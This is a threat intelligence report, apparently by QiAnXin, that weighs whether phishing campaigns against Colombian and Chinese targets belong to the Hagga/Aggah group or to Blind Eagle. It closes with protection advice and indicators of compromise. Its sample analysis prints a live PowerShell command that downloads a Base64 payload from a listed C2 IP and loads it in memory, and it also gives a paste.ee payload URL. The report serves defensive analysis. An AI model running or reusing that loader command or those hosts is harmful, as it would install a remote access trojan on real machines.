Background

Hagga/Aggah Group

Hagga is a threat organization motivated by information theft, first publicly disclosed by Unit 42 researchers in March 2019 ^[1]. Initially, researchers believed that these activities targeted internal organizations in the Middle East. Further research indicated that these activities might be part of a larger group, affecting not only the Middle East but also the United States, Europe, and Asia as a whole. Unit 42 referred to this group as Aggah. In the early stages of the attacks, when the Trojan sent data to the C2 server, it used the string "hagga" to separate information. This string was also the name of the PasteBin account hosting the payload information, leading to the name "Aggah" for this activity. Subsequently, foreign security researchers referred to this organization as Hagga/Aggah, and we will use the name Hagga in the following description.

Initially, Unit 42 believed that due to TTP similarities and the use of Revenge RAT, Hagga might be associated with the Gorgon Group, a Pakistani organization known for targeting Western governments. However, no prominent Gorgon Group indicators were observed in that investigation, so Unit 42 could not definitively link Hagga to the Gorgon Group.

Hagga has been active since 2019, with traces dating back to 2018. They typically use the same TTPs in their attack activities. In the early stages, the organization used Internet Archive, Pastebin, and Blogspot to host malicious scripts and payloads, often employing RevengeRAT. Subsequently, RATs such as LimeRAT, NjRAT, AsyncRAT, NanoCoreRAT, RemcosRAT, and Agent Tesla have been observed.

The following image illustrates the publicly disclosed activities of the Hagga organization over the years.

Blind Eagle (APT-Q-98)

Blind Eagle (internally identified as APT-Q-98 by QiAnXin) is an APT organization independently discovered and first disclosed by QiAnXin. The Blind Eagle organization is a suspected APT group originating from South America, primarily targeting Colombia. Since April 2018, this organization has carried out organized, planned, and targeted long-term attacks against Colombian government institutions and large companies in vital sectors such as finance, oil, and manufacturing.

In the early stages, the TTPs of the Blind Eagle organization involved intrusions into Spanish-language websites or registering domain names with privacy protection and uploading payload files and documents for attacks. They delivered bait documents in MHTML format with malicious macros, encrypted with RAR, through spear-phishing emails. The RAR decryption password was then included in the email body, effectively evading email gateway scans. The Blind Eagle organization often disguises itself as the Colombian National Civil Registry, National Tax and Customs Administration, National Statistical Office, National Cyber Police, and National Department of Justice, targeting the government and financial institutions in Colombia, as well as large domestic or multinational companies' Colombian branches. They use commercial Trojans for remote control of the targets and employ dynamic domain-based remote control techniques. Their ultimate goal is to implant backdoors to gain control over the target computers, providing a foundation for lateral movement in subsequent stages.

Throughout the investigation, the Hagga organization and the Blind Eagle organization have been tracked as two separate entities. However, there are certain similarities in TTPs between Hagga and Blind Eagle. Moreover, both organizations primarily use commercial or open-source Trojans as their final payloads, making it difficult to differentiate them based on TTPs. Currently, there is no strong evidence to establish a direct relationship between the Hagga and Blind Eagle organizations. However, some foreign security researchers speculate that Hagga may offer its hacking services for sale ^[2].

Investigation Trigger

The QiAnXin Threat Intelligence Center's RedDrIp team has been continuously tracking major APT organizations worldwide. During the investigation of the Blind Eagle APT-Q-98 group, which is active in South America, we discovered that since 2022, hundreds of bait PDF files have been uploaded from Colombia. These bait PDFs are primarily distributed via email, often masquerading as various Colombian institutions, including the Ministry of Justice, Tax and Customs Administration, Davivienda Bank, Ministry of Finance, Ministry of Transportation, and law firms. These PDF files embed compressed file passwords within the body and entice victims to click on short links to download the compressed files. Upon extraction, victims are tricked into executing VBS scripts disguised as PDFs, initiating a complex multi-stage fileless infection chain that ultimately loads remote control software.

The initial lure emails were written in Spanish.

Fines and penalties notice for traffic accidents from Colombia's comprehensive information processing system SIMIT.

Restriction notice disguised as being issued by Davivienda Bank in Colombia.

Notice related to personal income tax issues from Colombia's Ministry of Finance, Tax, and Customs Administration.

Summons notice from the Judicial Committee of Colombia's Supreme Court.

Initially, we investigated a large number of bait files, which exhibited TTPs nearly identical to those of Blind Eagle. The bait files were written in Spanish and uploaded from Colombia, aligning with Blind Eagle's attack targets and technical characteristics. Therefore, we initially attributed these attack activities to the Blind Eagle organization.

During the analysis of these files, we discovered an IP address, 172.174.176.153, hosting an open directory used to store subsequent payloads. This finding aligns with the blog published by the foreign company BlackBerry regarding the disclosure of Blind Eagle activities [3]. However, after some time, the hosted content in the open directory of this IP address was updated, which caught our attention.

After analyzing the new payload, we discovered that it is still a C# injector commonly used by the Blind Eagle organization. However, on the same day, we came across a new phishing email related to that IP, which appeared to be a spear-phishing attack targeting a Chinese company based on its content. However, both the email content and the bait attachment seemed quite crude and resembled more the work of ordinary hacking groups rather than a professional APT organization.

Reviewing the attack activities of Blind Eagle since their disclosure, we haven't found any examples of them targeting China. However, the arrival of this attack email forced us to reevaluate the organization behind the attack activities previously attributed to Blind Eagle.

Attribution of Activities

Back in 2019, when we publicly disclosed the attack activities of Blind Eagle, we also shared their TTPs in a blog post ^[4].

The following diagram represents the attack flow of Blind Eagle as disclosed by another cybersecurity company in 2022 ^[5].

We have represented the attack chain of this recent Hagga organization's attack activity using the following diagram.

As can be seen, this recent attack activity aligns with Blind Eagle's previous TTPs to a large extent. It has not only improved certain details of the activities but also expanded the range of initial bait documents, including office documents carrying vulnerabilities and highly effective bait PDF documents for bypassing antivirus detection. The main difference lies in the variation of the final loaded Remote Access Trojan (RAT).

Based on the above comparison, we cannot differentiate the Blind Eagle organization from the Hagga organization based on TTPs alone. Therefore, we attempted to attribute them based on the following details.

(1) Target of the Attack

Known Blind Eagle organization primarily targets locations within Colombia and some regions in South America, such as Ecuador, Panama, Chile, etc. On the other hand, the known targets of the Hagga organization include countries in the Middle East, Europe, Asia, and the Americas. Although most of the captured samples originate from the Colombian region, due to the discovery of attack samples targeting Chinese companies and considering the previous instances of Hagga organization targeting Taiwan ^[6], we are inclined to attribute this activity to the Hagga organization.

(2) Similarities in the Hosting of Malicious Payloads

The IP hosting the malicious payload, 172.174.176.153, shares the same directory structure and file name suffix as the one disclosed by another cybersecurity company for the Hagga organization ^[7].

In 2022, a foreign cybersecurity company disclosed that the Hagga organization appeared to be using XAMPP as a web server and hosting the Mana Tools C2 panel on a Windows virtual server ^[8]. The IP hosting the malicious payload, 172.174.176.153, is also using XAMPP and the default port 3306 (MySQL server's default port).

(3) Language and Sender Address of the Spear-phishing Email

The Blind Eagle organization primarily uses Spanish to create bait for their attacks, while the spear-phishing email in this case is in English. Additionally, the actual sender domain of the captured email is slot0.cedarstz.top, which resolves to IP 185.28.39.60, a known zombie network. As early as 2020, a foreign cybersecurity company described how the Hagga organization operates a zombie network without renting servers ^[9].

(4) Usage of Commercial Trojans

The commercial and open-source Trojans observed being used by the Hagga organization include RevengeRAT, LimeRAT, NjRAT, AsyncRAT, NanoCoreRAT, WarzoneRAT, RemcosRAT, Agent Tesla, etc., whereas the Trojans observed being used by the Blind Eagle organization include LimeRAT, NjRAT, AsyncRAT, Imminent Monitor RAT, QuasarRAT, etc. Based on existing reports, the collection of Trojans used by the Hagga organization is greater than that used by the Blind Eagle organization, indicating that the Hagga organization has a wider range of activities and higher frequency.

Speculations

(1) Possibility 1: Is the Hagga Group a Sub-group of the Blind Eagle Group?

From the TTP perspective, the two are very similar. Both use Spanish for spear-phishing attacks targeting Colombia, both download payloads from public repositories, both use dynamic domains for C2, both employ publicly available commercial Trojans as final payloads, and both have information theft as their objective.

Although there is no strong evidence to prove a direct relationship between the Hagga and Blind Eagle organizations, we speculate that they may have a complementary relationship. One focuses on attacking Colombia while the other establishes a zombie network and shows interest in major countries worldwide.

(2) Possibility 2: Does the Hagga Group Provide Cyber Weapons to the Blind Eagle Group?

In 2020, the Hagga organization not only targeted Europe but was also discovered engaging in Bitcoin theft activities. In their recent activities, the attackers impersonated B2B companies in Europe, the Middle East, and Asia, indicating that their targets are not limited to specific regions. The targeted victims' sectors and locations also indicate that the attackers are attempting to disrupt businesses across various industries, from manufacturing to agriculture.

Additionally, on the Medium platform, Paul Burbage pointed out that the Hagga organization sells or provides malicious software for free to Nigerian threat actors, which aligns with the data they have discovered ^[10]. This suggests that the Hagga organization could potentially sell their TTPs and malicious software to the Blind Eagle organization as well.

(3) Possibility 3: Imitating TTPs?

Throughout the entire attack chain, whether it's the hosting platforms or the VBS, PowerShell, and C# code, these can be considered open-source code for reverse engineers, allowing for direct replication and debugging. Therefore, the possibility of imitating TTPs cannot be ruled out.

Sample Analysis

The attachment INV20230503.xlsx in the aforementioned spear-phishing email carries the document with the CVE-2017-11882 vulnerability. Through the vulnerability, it accesses the GEE.vbs hosted on 109.206.240.64, then releases and executes KJH.vbs in the %appdata% directory. KJH.vbs ultimately invokes PowerShell to request new_rump_vb.net.txt from 172.174.176.153 for execution.

Within the GEE.vbs hosted on 109.206.240.64, there are numerous harmless or even open-source code snippets, while the actual malicious code is hidden within a few lines.

The functionality of this VBS code is to call PowerShell to execute the following code:

powershell\.exe \[Byte\[\]\] $rOWg = \[system\.Convert\]::FromBase64string\(\(New\-Object Net\.WebClient\)\.DownloadString\('http://172\.174\.176\.153/dll/new\_rump\_vb\.net\.txt'\)\);\[System\.AppDomain\]::CurrentDomain\.Load\($rOWg\)\.GetType\('Fiber\.Home'\)\.GetMethod\('VAI'\)\.Invoke\($null, \[object\[\]\] \('04\*●\*☞\#:▶ITS\!\}\(ú░\}\(úø\(@@\*ú4\*●\*☞\#:▶4\}�ø▶4\*●\*☞\#:▶∞\*▲◀\(∞\*▲◀\(\.∞\*▲◀\(ø☀☞√�\}П�sap4\*●\*☞\#:▶4\*●\*☞\#:▶▶☟ð\}↓→\+◀spø☀☞√�\}П�ø☀☞√�\}П�↓\*\(▲☟@\*⇝','1','2No3me\_3tartup'\)\)

Mounted under 172.174.176.153, the new_rump_vb.net.txt file is encoded using Base64 and protected with Eziriz .NET Reactor shell protection.

The PowerShell script calls the VAI function, which, internally, first performs string replacements and downloads the subsequent payload. The replaced strings are relatively fixed, and during our tracking process, they remained unchanged for a considerable period of time. For this reason, we copied their code and created a dedicated string replacement function.

The subsequent payload is downloaded from https://paste.ee/d/2cSTI/0, and a puppet process is created to run it.

The final injected payload is RemcosRAT.

It is worth mentioning that since the upload of new_rump_vb.net.txt on May 1st, within just two weeks, we have identified 66 malicious documents related to it. These include lure documents in xlsx and RTF formats, executable documents in RAR and VBS formats, and even HTML pages.

Conclusion

Based on our tracking findings and the analysis of open-source reports, we believe that the Blind Eagle and Hagga organizations share highly similar TTPs, making it difficult to distinguish between them. In the absence of definitive evidence, we have put forward some hypotheses, hoping to discover more clues to substantiate them in the subsequent threat hunting process. Given the complexity of APT organization attacks and the indiscriminate nature of Hagga organization's attacks on major countries worldwide, the QiAnXin Threat Intelligence Center will conduct long-term tracing and monitoring to promptly detect security threats and respond effectively.

APT organization attacks have always posed significant cybersecurity threats to nations and enterprises. They are typically carefully planned by individuals driven by commercial or political motives, targeting specific organizations or countries. These attacks maintain a high level of stealthiness over an extended period, necessitating constant vigilance.

Protection Recommendations

QiAnXin Threat Intelligence Center reminds users to beware of phishing attacks. Do not open links of unknown origin shared on social media, refrain from executing email attachments from unknown sources, avoid running unknown files with exaggerated titles, and refrain from installing apps from unofficial sources. It is important to regularly backup important files and keep software up to date by installing patches.

If there is a need to run an application of unknown origin, it is recommended to use the QiAnXin Threat Intelligence File Deep Analysis Platform (https://sandbox.ti.qianxin.com/sandbox/page) for identification. Currently, the platform supports deep analysis of various file formats, including Windows and Android platforms.

Currently, all products based on the threat intelligence data from the QiAnXin Threat Intelligence Center, including QiAnXin Threat Intelligence Platform (TIP), TianQing, TianYan Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situational Awareness, support accurate detection of such attacks.

IOC

MD5

8b4f37321a0943710991cfcb3b9b7190

ca6e616516964c35a0029bd051433945

19cfa6cb0add650c185be261ec837c30

92f37f5ac6d35f6f3648cfa468adbffb

b12dd8f3f0b4212ff6cbcbf953cd0c3d

fcda30f5e20e58c4488d0df22a5394c7

d1e0b8fd32607d972bf7ab08d3320bf7

79a9db31615e2b361f71b59dc38f7662

7824c8d9d48574a486b3ec2a61366365

4ea92c0e20bdc3b2260e8aebbdff29b5

b74d4df1edcc90c7f87ed1e317c65374

4ecbe5d483acc108ef3d4da1d0059667

e2b587346c7ba0df3d7656bf9c7fdd9b

a31a7e05c61a8714ff19069783e58b9d

994d66210dc9bf9cb7cec98ef74851a1

e0138ce3c2ad2a6a5526c925a491b336

6a97a1e05e95160145ee9eb8f565183e

a0855f2c4380b341f52bc20234ef51ef

476b807185039dc3757357c152b591d8

a53fd55368da169f33c0c6627a8aed6e

654b91ef5cac54600b778d7c6be61e91

ddb48789abe7a64fc57602447429f1aa

baebfc034c16952a7f03e3f3f1098e55

8c9632cc3a6b9b200c32eadf2037a531

ca79dc9ed70ffa093ef6fd9329340c26

9083644ca81cee6b82cf47eadb0205f6

5bc94fc42ecb7f2251105b6594ad8c23

436dfd3124389a33003d110611d40e0a

ea078b7cb5f046ca1391fff5e854a803

0e158df9d670f7fd3c6e307cf3a5115c

bd56581e6aa04b2d326b7fa61d9de59a

781d4bb9c2d7c0db25bae7228950e9ba

2871b39fa86ec78cba889f49878a2aa7

bf8f015801c158f139cc224b73a44efe

a7fc8d377baa2c48338c92ab155e2ebb

2734bf79d4e97db0d2bbb3a9d36001e9

08441cf0620348e6883f637d66f1c85e

72f2d66b0e2488f909adc83011344ad7

74490857d1514e063b83cb41176f8e83

d5e7e28df1eb397fe1d9fd5ab0963117

ebcc4866e1998c791921282b5a796b0e

4e22e125dd1e19f9205f0a55bea3ceca

da683e9d524b18d9912cb861e0e0d3ed

d16261e50f2006b2269c192e8f54de0c

7b9d0e8d2e36443f119637ebfc3064c8

dfcf236ba98c04e4eb880ed7ced53e5f

C&C

5.42.199.235

172.174.176.153

195.178.120.24

109.206.240.64

proccesupdate.duckdns.org:3460

potter1024.duckdns.org:1024

system88.duckdns.org:7777

Reference Links

[1]. https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/

[2]. https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

[3]. https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

[4]. https://ti.qianxin.com/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations/

[5]. https://mp.weixin.qq.com/s/mTmJLHYC9bJDnphf_52JmA

[6]. https://www.anomali.com/blog/aggah-using-compromised-websites-to-target-businesses-across-asia-including-taiwan-manufacturing-industry

[7]. https://marcoramilli.com/2022/11/21/is-hagga-threat-actor-abusing-fsociety-framework/

[8]. https://www.team-cymru.com/post/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor

[9]. https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

[10]. https://medium.com/@paul.k.burbage/aggah-not-exactly-apt-5e51aaff95f5